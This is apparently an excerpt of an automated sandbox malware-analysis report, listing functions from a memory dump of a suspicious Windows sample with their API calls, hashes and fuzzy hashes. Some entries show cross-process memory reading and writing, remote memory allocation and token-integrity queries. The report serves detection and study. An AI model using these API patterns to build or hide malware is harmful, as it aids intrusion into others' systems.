                                • API ID: ErrorLastconnectinet_addrsocket
                                • String ID:
                                • API String ID: 3701255441-0
                                • Opcode ID: be8960be92865f4a92aed380fb1292fe686015bc26ed1132011300e9575a581e
                                • Instruction ID: f982f757e3a47b20953d1815aaa837a2a4516c7c749060576b9395b09025424f
                                • Opcode Fuzzy Hash: be8960be92865f4a92aed380fb1292fe686015bc26ed1132011300e9575a581e
                                • Instruction Fuzzy Hash: F22190312002119FDB00AF68CC89BAE77A9EF49724F048419FA57AB395CA70EC019B51
                                Function 00CB89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32(00000000), ref: 00CB89CE
                                • GetForegroundWindow.USER32 ref: 00CB89E5
                                • GetDC.USER32(00000000), ref: 00CB8A21
                                • GetPixel.GDI32(00000000,?,00000003), ref: 00CB8A2D
                                • ReleaseDC.USER32(00000000,00000003), ref: 00CB8A68
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ForegroundPixelRelease
                                • String ID:
                                • API String ID: 4156661090-0
                                • Opcode ID: bbba1e2890ff3cc5aba18ddcf274025ab6c72d41dbc1e606b10be681a7841baf
                                • Instruction ID: 3faad3e8442f15280137b8dc3b144ff78310c2d176166b6672516c79137a3e24
                                • Opcode Fuzzy Hash: bbba1e2890ff3cc5aba18ddcf274025ab6c72d41dbc1e606b10be681a7841baf
                                • Instruction Fuzzy Hash: 73214F75A00204AFDB10EF65CC85BAA7BF9EF48305F048479F94A9B351DA70AD44DB60
                                Function 00C7B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C7B5EB
                                • SelectObject.GDI32(?,00000000), ref: 00C7B5FA
                                • BeginPath.GDI32(?), ref: 00C7B611
                                • SelectObject.GDI32(?,00000000), ref: 00C7B63B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ObjectSelect$BeginCreatePath
                                • String ID:
                                • API String ID: 3225163088-0
                                • Opcode ID: f888227421b17deee5be99adc1bb451976da57cd724d0bb8ef2a1a6fa44c06e1
                                • Instruction ID: 298025e22a7c51711ae03195b40ca350efb3229ae6cc2f3d702784d804947d3d
                                • Opcode Fuzzy Hash: f888227421b17deee5be99adc1bb451976da57cd724d0bb8ef2a1a6fa44c06e1
                                • Instruction Fuzzy Hash: 16217174800348BFDB249F25DC8479DBBE8FB30325F14C22AF529962A0D3714E928B60
                                Function 00C82E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                Download Yara Rule
                                APIs
                                • __calloc_crt.LIBCMT ref: 00C82E81
                                • CreateThread.KERNEL32(?,?,00C82FB7,00000000,?,?), ref: 00C82EC5
                                • GetLastError.KERNEL32 ref: 00C82ECF
                                • _free.LIBCMT ref: 00C82ED8
                                • __dosmaperr.LIBCMT ref: 00C82EE3
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                • String ID:
                                • API String ID: 2664167353-0
                                • Opcode ID: 8e14990fef0db9f114fe5f26e7456edd94a08133a6b859554634b7d97e750382
                                • Instruction ID: 2391eebb1957f887b7fc7bf1def327f4b33c77fa0bdaba529de9c9f81cc49500
                                • Opcode Fuzzy Hash: 8e14990fef0db9f114fe5f26e7456edd94a08133a6b859554634b7d97e750382
                                • Instruction Fuzzy Hash: AF112633104706AFDB20BFA5DC45EAB7BA8EF05778B100129FA24C6192EF31D800976C
                                Function 00C9B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C9B903
                                • GetLastError.KERNEL32(?,00C9B3CB,?,?,?), ref: 00C9B90D
                                • GetProcessHeap.KERNEL32(00000008,?,?,00C9B3CB,?,?,?), ref: 00C9B91C
                                • HeapAlloc.KERNEL32(00000000,?,00C9B3CB,?,?,?), ref: 00C9B923
                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C9B93A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 842720411-0
                                • Opcode ID: 465a98be6af86eeaaf074312f3a8b2acbf5dae9949dd8933d4152c8536e0484a
                                • Instruction ID: bdd0f46418997387b740265995f442bab4db4dc95e73a8ec9565e5c7786dc3d7
                                • Opcode Fuzzy Hash: 465a98be6af86eeaaf074312f3a8b2acbf5dae9949dd8933d4152c8536e0484a
                                • Instruction Fuzzy Hash: 88016971211258BFDF114FA5EC88F6B7BBEEF8A764B100429F956CA260DB718D40DA60
                                Function 00CA8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                Download Yara Rule
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA8371
                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CA837F
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CA8387
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CA8391
                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA83CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                • String ID:
                                • API String ID: 2833360925-0
                                • Opcode ID: 0b8f5b616fbb749f2e8789f3d712971b524710ca41ea21b82aea4a82c86f7d9b
                                • Instruction ID: f3337b721155ea4c031470143bbd8d50ddf8347be5b09a7199cb1bf548185c92
                                • Opcode Fuzzy Hash: 0b8f5b616fbb749f2e8789f3d712971b524710ca41ea21b82aea4a82c86f7d9b
                                • Instruction Fuzzy Hash: 9B012D75D0161ADBDF00AFA5ED88BEEBB78FB09B15F000455E542B2160DF709658C7A1
                                Function 00C9A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                Download Yara Rule
                                APIs
                                • CLSIDFromProgID.OLE32 ref: 00C9A874
                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C9A88F
                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00C9A89D
                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C9A8AD
                                • CLSIDFromString.OLE32(?,?), ref: 00C9A8B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                • String ID:
                                • API String ID: 3897988419-0
                                • Opcode ID: 491b190c40581cfa53d2fff137bc390c11c339fbfa4b9cdfa18a2c6e0ff7c54f
                                • Instruction ID: da599f00e8cc28d6ecba282bdc4b088e68db6f96fbf6f4a12437648f834e203d
                                • Opcode Fuzzy Hash: 491b190c40581cfa53d2fff137bc390c11c339fbfa4b9cdfa18a2c6e0ff7c54f
                                • Instruction Fuzzy Hash: EB014B76600214BFEF215F68DC88BAEBBBDEF44791F144024B902DA2A0D771DE419BE1
                                Function 00C9B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C9B806
                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B810
                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B81F
                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B826
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B83C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: c9f4771b1607873d6933ce44134d7d8c1615aa888fdbe674d243d8f00e15d4f7
                                • Instruction ID: 42c25b73c4dca8e4bb27107420372204d1584bdffccc6816622a905566860f85
                                • Opcode Fuzzy Hash: c9f4771b1607873d6933ce44134d7d8c1615aa888fdbe674d243d8f00e15d4f7
                                • Instruction Fuzzy Hash: D9F03775200344BFEB211FA5ECCCB6B7B6DFF4A764B000429F952CA1A0CB619E418A60
                                Function 00C9B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C9B7A5
                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C9B7AF
                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C9B7BE
                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C9B7C5
                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9B7DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: 999ae56f11cd637bede7109201b009452490f45cea2b87792ae4bbe8cc8086ea
                                • Instruction ID: 1d976370b3a2bd4cb65d0768bd301dc1acd0417854a01c1c241f4286fdf63183
                                • Opcode Fuzzy Hash: 999ae56f11cd637bede7109201b009452490f45cea2b87792ae4bbe8cc8086ea
                                • Instruction Fuzzy Hash: 9FF03771240344BFEB101FA5ACC9F6B3BACFF8A765B10412AFA52CA160DB619D418A70
                                Function 00C9FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00C9FA8F
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C9FAA6
                                • MessageBeep.USER32(00000000), ref: 00C9FABE
                                • KillTimer.USER32(?,0000040A), ref: 00C9FADA
                                • EndDialog.USER32(?,00000001), ref: 00C9FAF4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                • String ID:
                                • API String ID: 3741023627-0
                                • Opcode ID: f10983179efbd1437b642648548af66683f779c5ef639a7040f58b9f28c8e48b
                                • Instruction ID: c09446ca976e305f660d26e77e38a8a2ee66e1c95a9964f38ae3f326af2cae31
                                • Opcode Fuzzy Hash: f10983179efbd1437b642648548af66683f779c5ef639a7040f58b9f28c8e48b
                                • Instruction Fuzzy Hash: 36018170500745AFEF309B20DD8EB9A77B8BB00B09F04066DB597A90E0DFF1AA559A51
                                Function 00C7B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • EndPath.GDI32(?), ref: 00C7B526
                                • StrokeAndFillPath.GDI32(?,?,00CDF583,00000000,?), ref: 00C7B542
                                • SelectObject.GDI32(?,00000000), ref: 00C7B555
                                • DeleteObject.GDI32 ref: 00C7B568
                                • StrokePath.GDI32(?), ref: 00C7B583
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                • String ID:
                                • API String ID: 2625713937-0
                                • Opcode ID: 943f19600bf1dda83a1e30ff35bcce15ceb34400e2559eabc18833a2ff2173e5
                                • Instruction ID: 10220f7a44e3488a5fc55f792fc8e3e0f580f15ab7122a72fef754070417580a
                                • Opcode Fuzzy Hash: 943f19600bf1dda83a1e30ff35bcce15ceb34400e2559eabc18833a2ff2173e5
                                • Instruction Fuzzy Hash: 88F0EC34000348EFDB699F25ED8C7587FE5B721322F18C215E5AA882F0C7318A96DF20
                                Function 00CAFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00CAFAB2
                                • CoCreateInstance.OLE32(00CEDA7C,00000000,00000001,00CED8EC,?), ref: 00CAFACA
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • CoUninitialize.OLE32 ref: 00CAFD2D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                • String ID: .lnk
                                • API String ID: 2683427295-24824748
                                • Opcode ID: def822903c1aebda73cb64c9d6bf5120dedc7d8d79562f5637bd5a16a757efd0
                                • Instruction ID: 3341686055c4923a8110a08cfbcdfd2813e107a854dbd7d30685ca58f395abb2
                                • Opcode Fuzzy Hash: def822903c1aebda73cb64c9d6bf5120dedc7d8d79562f5637bd5a16a757efd0
                                • Instruction Fuzzy Hash: 3EA13E71504205AFC300EFA4CC91EABB7EDEF98704F50891DB195971A2EB70EA09DB92
                                Function 00CAEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00CA78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00CA78CB
                                • CoInitialize.OLE32(00000000), ref: 00CAF04D
                                • CoCreateInstance.OLE32(00CEDA7C,00000000,00000001,00CED8EC,?), ref: 00CAF066
                                • CoUninitialize.OLE32 ref: 00CAF083
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                • String ID: .lnk
                                • API String ID: 2126378814-24824748
                                • Opcode ID: 3812da98384d059d00070b231672b1dc6e550010ad969d46714b795521108705
                                • Instruction ID: b2a3efe15ba9049e02a52e9efe48dead8ca3efbbc8634b69e4c1e78f822216c3
                                • Opcode Fuzzy Hash: 3812da98384d059d00070b231672b1dc6e550010ad969d46714b795521108705
                                • Instruction Fuzzy Hash: 5BA147756043029FC710DF54C884E6AB7E5BF89324F14855CF99AAB3A1CB31ED46CB91
                                Function 00C7DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: #$+
                                • API String ID: 0-2552117581
                                • Opcode ID: 467a435739b76f54633bf410f12c67ea975f5b9baff550d54ea37741e15d84fb
                                • Instruction ID: dab195973191bf6138158f25484be0fb43dff18be75804d13a2dc9162e133581
                                • Opcode Fuzzy Hash: 467a435739b76f54633bf410f12c67ea975f5b9baff550d54ea37741e15d84fb
                                • Instruction Fuzzy Hash: 865123751042569FDF19EF68C485AFA7BB4EF1A310F248056FAA29B3A0D734DE42C720
                                Function 00CA503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00CFDC40,?,0000000F,0000000C,00000016,00CFDC40,?), ref: 00CA507B
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                  • Part of subcall function 00C6B8A7: _memmove.LIBCMT ref: 00C6B8FB
                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00CA50FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper$__itow__swprintf_memmove
                                • String ID: REMOVE$THIS
                                • API String ID: 2528338962-776492005
                                • Opcode ID: 2ff51548d286509edb57ac99dd6db111bed223b24a83e889f1a0ded9728437ba
                                • Instruction ID: 735c96ecc80cd955b977ca47675e338c92b53981bdfa80a7db5e5e4babe3c9a9
                                • Opcode Fuzzy Hash: 2ff51548d286509edb57ac99dd6db111bed223b24a83e889f1a0ded9728437ba
                                • Instruction Fuzzy Hash: CD419074A0060AAFCF10DF54C8C5BBEB7B5BF49308F048469E956AB392DB349D45DB50
                                Function 00C9CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00CA4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C9C9FE,?,?,00000034,00000800,?,00000034), ref: 00CA4D6B
                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C9CFC9
                                  • Part of subcall function 00CA4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C9CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00CA4D36
                                  • Part of subcall function 00CA4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00CA4C90
                                  • Part of subcall function 00CA4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C9C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CA4CA0
                                  • Part of subcall function 00CA4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C9C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00CA4CB6
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9D036
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                • String ID: @
                                • API String ID: 4150878124-2766056989
                                • Opcode ID: 2d5192eee81a22a3db78074387a758293c321675e77851cd1ca26c669ebd1e0a
                                • Instruction ID: 12c705a9a7ddea4d5d9f7e45d36e6607461efd114ae3e0ed7889fddb8c51d2ae
                                • Opcode Fuzzy Hash: 2d5192eee81a22a3db78074387a758293c321675e77851cd1ca26c669ebd1e0a
                                • Instruction Fuzzy Hash: 09415A72900219AEDB14DFA4CC85BDEBBB8AF49700F008095FA56BB181CA716E45DB60
                                Function 00CCA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
